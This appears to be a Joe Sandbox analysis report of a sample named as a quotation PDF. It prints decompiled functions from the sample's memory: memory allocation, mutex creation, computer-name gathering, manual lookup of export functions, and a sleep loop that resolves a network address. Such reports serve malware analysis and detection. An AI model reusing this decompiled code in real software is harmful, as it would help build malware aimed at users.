0x0040b827
0x0040b82a
0x0040b830
0x0040b830
0x0040b813
0x0040b816
0x0040b81c
0x0040b81c
0x0040b852

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 554d5f97c964abd0475726dc05d1f629dad975578d52aa9603f4671f30cbc54f
Instruction ID: 735ccec013ae61eb18b11ffafd9a13c1a41aaa2b1a623ce23807e612dff77d9d
Opcode Fuzzy Hash: 554d5f97c964abd0475726dc05d1f629dad975578d52aa9603f4671f30cbc54f
Instruction Fuzzy Hash: 03F0F832904208FFCF14AFA1D80579C7BA9FB04769F20C03AF509A51A0C7798A81AB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B727 Relevance: 2.5, APIs: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B727(void* __ecx, long _a4, long _a8) {
				void* _v8;
				long _v12;
				void* _t9;

				_t9 = VirtualAlloc(0, _a4, _a8, 4); // executed
				_v8 = _t9;
				if(_v8 == 0) {
					_v12 = GetLastError();
				}
				E0040132F(_v8, 0, _a4);
				return _v8;
			}

0x0040b736
0x0040b73c
0x0040b743
0x0040b74b
0x0040b74b
0x0040b756
0x0040b762

APIs

VirtualAlloc.KERNEL32(00000000,?,0040B08C,00000004,?,?,?,00406B80,00000000,?,0040B08C,.bss,?), ref: 0040B736
GetLastError.KERNEL32(?,?,?,00406B80,00000000,?,0040B08C,.bss), ref: 0040B745

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 780d75164db51f028c85cbee2c5e5e4755fc93ea44e4f59aab32ea880bb41651
Instruction ID: 9358c3cb36320dc1be0ccc789337654f456c19488666d96394f845c49eae7cf1
Opcode Fuzzy Hash: 780d75164db51f028c85cbee2c5e5e4755fc93ea44e4f59aab32ea880bb41651
Instruction Fuzzy Hash: 66E01A74A0020CFFEF11AFA0DC0AB9D7B75EF04355F104068FA046A2A0D3B15B50AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4F6 Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041E4F6() {
				intOrPtr _t50;
				void* _t63;

				__imp__#9(_t63 - 0x3c);
				do {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0x10)))) + 8))( *((intOrPtr*)(_t63 - 0x10)));
					 *((intOrPtr*)(_t63 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0x14)))) + 0x10));
					 *((intOrPtr*)(_t63 - 4)) =  *((intOrPtr*)(_t63 - 0x20))( *((intOrPtr*)(_t63 - 0x14)), 0xffffffff, 1, _t63 - 0x10, _t63 - 0x2c);
					if( *((intOrPtr*)(_t63 - 4)) == 1) {
						L8:
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0x14)))) + 8))( *((intOrPtr*)(_t63 - 0x14)));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0xc)))) + 8))( *((intOrPtr*)(_t63 - 0xc)));
						_t50 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 8)))) + 8))( *((intOrPtr*)(_t63 - 8)));
					} else {
						if( *((intOrPtr*)(_t63 - 4)) >= 0) {
							goto L4;
						} else {
							goto L8;
						}
					}
					L9:
					return _t50;
					L4:
					__imp__#8(_t63 - 0x3c);
					 *((intOrPtr*)(_t63 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0x10)))) + 0x10));
					_push(0);
					_push(0);
					_push(_t63 - 0x3c);
					_push(0);
					_push(L"Name");
					_push( *((intOrPtr*)(_t63 - 0x10)));
				} while ( *((intOrPtr*)(_t63 - 0x24))() < 0 || ( *(_t63 - 0x3c) & 0x0000ffff) != 8);
				E00406F64( *((intOrPtr*)(_t63 + 8)),  *((intOrPtr*)(_t63 - 0x34))); // executed
				_t50 =  *((intOrPtr*)(_t63 + 8));
				goto L9;
			}

0x0041e4fa
0x0041e500
0x0041e508
0x0041e489
0x0041e49e
0x0041e4a5
0x0041e510
0x0041e518
0x0041e523
0x0041e52e
0x0041e4a7
0x0041e4ab
0x00000000
0x0041e4ad
0x00000000
0x0041e4ad
0x0041e4ab
0x0041e531
0x0041e532
0x0041e4af
0x0041e4b3
0x0041e4c1
0x0041e4c4
0x0041e4c6
0x0041e4cb
0x0041e4cc
0x0041e4ce
0x0041e4d3
0x0041e4d9
0x0041e4ec
0x0041e4f1
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 0041E4B3
VariantClear.OLEAUT32(?), ref: 0041E4FA

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: da8432127b9c9527346fd3ebb39b5037b3d6cbffd36f721d126d8f4204670669
Instruction ID: 3c7dd94f18545b6fae746107d32bf2480ef1bb60c8ed08cd7949f88573ba7828
Opcode Fuzzy Hash: da8432127b9c9527346fd3ebb39b5037b3d6cbffd36f721d126d8f4204670669
Instruction Fuzzy Hash: 29114B78A00219EFCF01DF98C988DEDBBB5FF49315F1045A2E912A7260D735AA85DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00406A55 Relevance: 1.5, APIs: 1, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A55(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				signed int _t19;
				intOrPtr _t25;

				_v8 = __ecx;
				_t19 = E00406F1B(_v8);
				_v12 = (E00406F1B(_a4) << 1) + 4 + _t19 * 2;
				_v16 =  *_v8;
				_t25 = E0040B763(_v16, _v12); // executed
				 *_v8 = _t25;
				_v20 = E00406F44(_a4);
				_v24 =  *_v8;
				return lstrcatW(_v24, _v20);
			}

0x00406a5c
0x00406a62
0x00406a77
0x00406a7f
0x00406a88
0x00406a92
0x00406a9c
0x00406aa4
0x00406ab5

APIs

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

lstrcatW.KERNEL32(00000000,?), ref: 00406AAD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 161d7a9040afe075a91f1bbc34e4ccf705504a3f588cd6eb143fc86b36ae509a
Instruction ID: 1db04568ac8efbb203c73ed572b22665e2b4e700310f0d6aa0d48c0e02f7f6c4
Opcode Fuzzy Hash: 161d7a9040afe075a91f1bbc34e4ccf705504a3f588cd6eb143fc86b36ae509a
Instruction Fuzzy Hash: B901A475900109EFCB04EFA8D9818ADBBF5EF48344B1140AAE916B73A1DB309F11DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE3B Relevance: 1.5, APIs: 1, Instructions: 33
networkCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040AE3B(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = __ecx;
				E0040691E(_v8);
				E00406692(_v8 + 0x10);
				E00406692(_v8 + 0x30);
				_v12 = _v8 + 0x1d8;
				E0041F398(_v12, 0); // executed
				__imp__#115(2, _v8 + 0x38, __ecx, __ecx); // executed
				 *(_v8 + 0xc) =  *(_v8 + 0xc) | 0xffffffff;
				 *(_v8 + 0x18) =  *(_v8 + 0x18) & 0x00000000;
				 *(_v8 + 0x24) =  *(_v8 + 0x24) & 0x00000000;
				return _v8;
			}

0x0040ae40
0x0040ae46
0x0040ae51
0x0040ae5c
0x0040ae69
0x0040ae71
0x0040ae7f
0x0040ae88
0x0040ae8f
0x0040ae96
0x0040ae9e

APIs

Part of subcall function 0041F398: CreateMutexA.KERNEL32(00000000,?,00000000,?,?,0041F272,00000000,0040B069,0040B069,?,0041F616,?,?,0040B069), ref: 0041F3A6

WSAStartup.WS2_32(00000002,?), ref: 0040AE7F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateMutexStartup
String ID:
API String ID: 3730780901-0
Opcode ID: c6ba666eae7d60a5cd76bafef4f3e3548b26cdadd4d63dbb569df3642a8341a4
Instruction ID: 9406d9aa737648d431ac2e6373d18b628626616d20de4670c914c02eb36a9a57
Opcode Fuzzy Hash: c6ba666eae7d60a5cd76bafef4f3e3548b26cdadd4d63dbb569df3642a8341a4
Instruction Fuzzy Hash: FEF0EC70A10208EFDB04DF99C966BADB7B5EF40318F214199E441AB292CB75AF11DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00406930 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406930(void* __ecx, void* __eflags, intOrPtr _a4, WCHAR** _a8) {
				char _v8;
				long _v12;
				short _v1036;

				E0040132F( &_v1036, 0, 0x400);
				_v12 = ExpandEnvironmentStringsW( *_a8,  &_v1036, 0x1ff);
				E00406F64( &_v8,  &_v1036); // executed
				E00406FBC(_a4,  &_v8); // executed
				E00406BE2(); // executed
				return _a4;
			}

0x00406947
0x00406966
0x00406973
0x0040697f
0x00406987
0x00406990

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00406960

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$EnvironmentExpandStrings
String ID:
API String ID: 2266065360-0
Opcode ID: c6302a3a90a6a35b495cecc70aec21e2d4e0b9ac377d5dec90e2a614f292e752
Instruction ID: 01d5cb757bf1229a8b4a8dd87969b6195dc71c048ec7da5d370583bacf8a3419
Opcode Fuzzy Hash: c6302a3a90a6a35b495cecc70aec21e2d4e0b9ac377d5dec90e2a614f292e752
Instruction Fuzzy Hash: 85F0DAB590010CABCB40EBA4DD42EDDB7BCAB04304F5040BAB745F7191EF74AB5A8B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAAC Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EAAC(WCHAR** _a4) {
				long _v8;
				short _v40;
				signed int _t17;

				_t17 = 8;
				memset( &_v40, 0, _t17 << 2);
				_v8 = 0x10;
				GetComputerNameW( &_v40,  &_v8);
				E00406F64(_a4,  &_v40); // executed
				return _a4;
			}

0x0041eab5
0x0041eabb
0x0041eabd
0x0041eacc
0x0041ead9
0x0041eae3

APIs

GetComputerNameW.KERNEL32 ref: 0041EACC

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$ComputerNamelstrcpy
String ID:
API String ID: 461527575-0
Opcode ID: 03220e255983cb76a0651a6b75f34eea6b8a7e0db9b8b3d8d241015ea2a4dbf3
Instruction ID: b1ba75201aa9fa3910784ba9c59cc5cd433a8b322eae33da0c68472b92cac637
Opcode Fuzzy Hash: 03220e255983cb76a0651a6b75f34eea6b8a7e0db9b8b3d8d241015ea2a4dbf3
Instruction Fuzzy Hash: 14E0E5B6A0010CABCF00DBA5D9459CE77FCAB48304F104066E502A6180DB71EA49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC32 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041EC32(intOrPtr* __ecx, intOrPtr* _a4, int _a8) {
				intOrPtr* _v8;

				_push(__ecx);
				_v8 = __ecx;
				E00406830(_v8 + 4, _a4); // executed
				 *_v8 = CreateEventA(0, _a8, 0, E00406B4A(_v8 + 4));
				return 1;
			}

0x0041ec35
0x0041ec36
0x0041ec42
0x0041ec63
0x0041ec69

APIs

Part of subcall function 00406830: lstrcatA.KERNEL32(n@,00000000,00406EEF,00000000,?,?,?,?,0040975B,?,?,?,?,?), ref: 00406885

CreateEventA.KERNEL32(00000000,?,00000000,00000000,?,?,?,00424E5B,00000000,?,00000001), ref: 0041EC5A

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateEventlstrcat
String ID:
API String ID: 2275612694-0
Opcode ID: 771d72482387d6dfcf54f8742902eb52c84a4eca6b5fc9894fc373eacbacec7a
Instruction ID: 57a088f3d4779af826fd5a423d769db051a422ce2e62b3183b2ea15b055d5a5f
Opcode Fuzzy Hash: 771d72482387d6dfcf54f8742902eb52c84a4eca6b5fc9894fc373eacbacec7a
Instruction Fuzzy Hash: EFE04F71600108FFEB04EF94CD12F6DB775EF04308F104068F903B6381CA70AA20DA58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F398 Relevance: 1.5, APIs: 1, Instructions: 21
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041F398(void** __ecx, int _a4) {
				void** _v8;
				void* _t11;

				_push(__ecx);
				_v8 = __ecx;
				_t11 = CreateMutexA(0, _a4, 0); // executed
				 *_v8 = _t11;
				if( *_v8 != 0xffffffff) {
					_v8[1] = 1;
				} else {
					_v8[1] = _v8[1] & 0x00000000;
				}
				return _v8;
			}

0x0041f39b
0x0041f39c
0x0041f3a6
0x0041f3af
0x0041f3b7
0x0041f3c5
0x0041f3b9
0x0041f3bc
0x0041f3bc
0x0041f3d0

APIs

CreateMutexA.KERNEL32(00000000,?,00000000,?,?,0041F272,00000000,0040B069,0040B069,?,0041F616,?,?,0040B069), ref: 0041F3A6

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 3d0b43651847318d2c08ae711e8efbc6cf8b3126a1c32507169a09be0aef5b07
Instruction ID: 165d58f5d0b9028c5d977e6da23d7376bba8ce32db4835ab19eeeb58250929fe
Opcode Fuzzy Hash: 3d0b43651847318d2c08ae711e8efbc6cf8b3126a1c32507169a09be0aef5b07
Instruction Fuzzy Hash: 37F0ED70601208EFDB00CF94D545B9CBBF0FB05319F208196E9189B391D375AE51EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E21C Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041E21C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t6;

				_t6 = E00406F44(_a4);
				__imp__SHCreateDirectoryExW(0, _t6, 0, __ecx); // executed
				if(_t6 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = 1;
				}
				return _v8;
			}

0x0041e225
0x0041e22d
0x0041e235
0x0041e240
0x0041e237
0x0041e237
0x0041e237
0x0041e248

APIs

SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,00420B3E,zCB,00000000,80000001,zCB,000F003F,00000001), ref: 0041E22D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: a45a83b8fa3fbb3039e27a931a2c8930ccfe537e9852d8feb41ec03261b7f4a1
Instruction ID: 2de5eb52332c1abe1730fcce02e28f90bb9e48580cb3a74976255b218f456ec7
Opcode Fuzzy Hash: a45a83b8fa3fbb3039e27a931a2c8930ccfe537e9852d8feb41ec03261b7f4a1
Instruction Fuzzy Hash: E5D09E70704209FBEB00DB92D916FAE76BCEB0074DF1040D9E905AB1C0D7B99E859796

Uniqueness

Uniqueness Score: -1.00%

Function 004207E9 Relevance: 1.5, APIs: 1, Instructions: 14
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004207E9(void** __ecx) {
				void** _v8;
				signed int* _t6;

				_push(__ecx);
				_v8 = __ecx;
				if( *_v8 != 0) {
					RegCloseKey( *_v8); // executed
				}
				_t6 = _v8;
				 *_t6 =  *_t6 & 0x00000000;
				return _t6;
			}

0x004207ec
0x004207ed
0x004207f6
0x004207fd
0x004207fd
0x00420803
0x00420806
0x0042080a

APIs

RegCloseKey.KERNEL32(004241D6,004241D6,?,004207E7,004241D2,?,00420AA0,?,?,004241D6), ref: 004207FD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ffa5b0a11b5ed92604021067250ca584dd6f036b7f8be0d600d0d92b78eebba4
Instruction ID: 6ebf9e738a57b11d47a1cdf30a58a27f60192b5163f6d39962d17c800839a870
Opcode Fuzzy Hash: ffa5b0a11b5ed92604021067250ca584dd6f036b7f8be0d600d0d92b78eebba4
Instruction Fuzzy Hash: 70D09230A18208EFCB16DF88E945B8DB7F9EB05315F5100A4E404AB261C7B4AE40EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F37C Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041F37C(void** __ecx) {
				void** _v8;
				int _t6;

				_push(__ecx);
				_v8 = __ecx;
				E0041F329(_v8);
				_t6 = FindCloseChangeNotification( *_v8); // executed
				return _t6;
			}

0x0041f37f
0x0041f380
0x0041f386
0x0041f390
0x0041f397

APIs

Part of subcall function 0041F329: ReleaseMutex.KERNEL32(?,?,?,0041F38B,?,?,0041EE05,?,?,004031A6,?,?,0040B3D4,?,00000000,00000000), ref: 0041F335

FindCloseChangeNotification.KERNEL32(?,?,?,0041EE05,?,?,004031A6,?,?,0040B3D4,?,00000000,00000000,00000000,00000000,00000000), ref: 0041F390

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindMutexNotificationRelease
String ID:
API String ID: 4264517613-0
Opcode ID: c845878529e0a1640d7f61dee0631018b0b80b965e7ef4e096e0d74bad221815
Instruction ID: 05dda9951381f3c43d8898e40861982fb026111b8bfbaeea8cf318ac2d7fb344
Opcode Fuzzy Hash: c845878529e0a1640d7f61dee0631018b0b80b965e7ef4e096e0d74bad221815
Instruction Fuzzy Hash: 23C0123050410DEBCB04DBD5F90184D77B8AB0534875000B9B00193261CA716E01AB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF80 Relevance: 1.3, APIs: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FF80(void* __ecx, void* __eflags, intOrPtr _a4, CHAR* _a8, signed char _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				CHAR* _v32;
				char _v36;
				int _t57;
				signed int _t59;
				intOrPtr _t85;

				_v12 = E0041F960(__ecx, __eflags, _a4, 1, 0,  &_v36, 0);
				if(_v12 == 0) {
					L10:
					__eflags = 0;
					return 0;
				}
				_v28 = _a4 +  *((intOrPtr*)(_v12 + 0x20));
				_v8 = _v8 & 0x00000000;
				while(_v8 <  *((intOrPtr*)(_v12 + 0x18))) {
					_v32 = _a4 +  *((intOrPtr*)(_v28 + _v8 * 4));
					_t57 = lstrcmpA(_v32, _a8); // executed
					if(_t57 != 0) {
						_t59 = _v8 + 1;
						__eflags = _t59;
						_v8 = _t59;
						continue;
					}
					_v20 = _a4 +  *((intOrPtr*)(_v12 + 0x1c));
					_v16 = _a4 +  *((intOrPtr*)(_v12 + 0x24));
					if((_a12 & 0x000000ff) == 0) {
						_t85 = _a4 +  *((intOrPtr*)(_v20 + ( *(_v16 + _v8 * 2) & 0x0000ffff) * 4));
						__eflags = _t85;
						_v24 = _t85;
					} else {
						_v24 =  *((intOrPtr*)(_v20 + ( *(_v16 + _v8 * 2) & 0x0000ffff) * 4));
					}
					return _v24;
				}
				goto L10;
			}

0x0041ff9b
0x0041ffa2
0x00420040
0x00420040
0x00000000
0x00420040
0x0041ffb1
0x0041ffb4
0x0041ffc1
0x0041ffd8
0x0041ffe1
0x0041ffe9
0x0041ffbd
0x0041ffbd
0x0041ffbe
0x00000000
0x0041ffbe
0x0041fff4
0x00420000
0x00420009
0x00420030
0x00420030
0x00420033
0x0042000b
0x0042001b
0x0042001b
0x00000000
0x00420036
0x00000000

APIs

lstrcmpA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0041E2D2,00000000), ref: 0041FFE1

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 480fa6f333584bb57d21734f6e4b3905091153911af865ebc0278713b5d1c223
Instruction ID: 5dc7d57e149436ea43f3e76cd3972a318fbce68e34662e6604ae1a8aef9d1512
Opcode Fuzzy Hash: 480fa6f333584bb57d21734f6e4b3905091153911af865ebc0278713b5d1c223
Instruction Fuzzy Hash: 5531C774A00219EFDB14CF88D590BBEBBB1FF48304F50409AE906A7352D735AE52DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004096E8 Relevance: 1.3, APIs: 1, Instructions: 57
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004096E8(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v44;
				char _v52;
				intOrPtr _t32;
				void* _t38;
				intOrPtr* _t43;
				intOrPtr _t45;
				void* _t62;

				_v8 = __ecx;
				 *((intOrPtr*)(_v8 + 0x248)) = 1;
				while(1) {
					_t32 = _v8;
					_t63 =  *((intOrPtr*)(_t32 + 0x248));
					if( *((intOrPtr*)(_t32 + 0x248)) == 0) {
						break;
					}
					_v28 = _v8 + 4;
					_v12 = _v8 + 0x1e4;
					_t38 = E0040B4C6(_v12,  &_v52); // executed
					_v20 =  *((intOrPtr*)(_t38 + 4));
					_v16 = _v8 + 0x1e4;
					_t43 = E0040B4C6(_v16,  &_v44); // executed
					_v24 = _t43;
					E00406E4B(_v24, _t63, _t62); // executed
					_t45 = E0040AC93(_v28, _v16, _v20); // executed
					_v32 = _t45;
					E00401698( &_v44); // executed
					E00401698( &_v52); // executed
					if(_v32 != 0) {
						_v36 = _v8 + 4;
						E0040AA23(_v36, _v8 + 4, _v8); // executed
					}
					Sleep(E0040B4A8(_v8 + 0x1e4));
				}
				return _t32;
			}

0x004096ee
0x004096f4
0x004096fe
0x004096fe
0x00409701
0x00409708
0x00000000
0x00000000
0x00409714
0x0040971f
0x00409729
0x00409731
0x0040973c
0x00409746
0x0040974b
0x00409756
0x0040975e
0x00409763
0x00409769
0x00409771
0x0040977a
0x00409782
0x0040978b
0x0040978b
0x0040979f
0x0040979f
0x004097ab

APIs

Part of subcall function 00406E4B: WideCharToMultiByte.KERNEL32(00000000,00000200,0040975B,?,00000000,00000000,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406E90
Part of subcall function 00406E4B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406ED5

Part of subcall function 0040AC93: getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 0040ACFB

Sleep.KERNEL32(00000000,?,?,?,?,?), ref: 0040979F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$Sleepgetaddrinfo
String ID:
API String ID: 2299972608-0
Opcode ID: 147035c980f81b680c6dcb80580a1aae186c2529157a0f2ab7330ebf0e130c61
Instruction ID: 9fb10c07e2b30dfadc48628e0ed7ad203184129bb14fa58294b077f0635714f6
Opcode Fuzzy Hash: 147035c980f81b680c6dcb80580a1aae186c2529157a0f2ab7330ebf0e130c61
Instruction Fuzzy Hash: DF21B471D10108EFDB04EF99C985AEDBBB5EF04308F14457AE405B72A2DB38AE51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBC Relevance: 1.3, APIs: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406FBC(WCHAR** __ecx, WCHAR** _a4) {
				WCHAR** _v8;
				WCHAR* _t16;

				_push(__ecx);
				_v8 = __ecx;
				 *_v8 =  *_v8 & 0x00000000;
				if( *_a4 != 0) {
					_t16 = E0040B7F4(E00406F1B(_a4) + _t14 + 2, 0x3000); // executed
					 *_v8 = _t16;
					lstrcpyW( *_v8,  *_a4);
				}
				return _v8;
			}

0x00406fbf
0x00406fc0
0x00406fc6
0x00406fcf
0x00406fe3
0x00406fed
0x00406ff9
0x00406ff9
0x00407003

APIs

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

Part of subcall function 0040B7F4: VirtualAlloc.KERNEL32(00000000,?,?,00000004,?,00406FE8,?,00003000,?,?,00422109,?), ref: 0040B801

lstrcpyW.KERNEL32 ref: 00406FF9

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

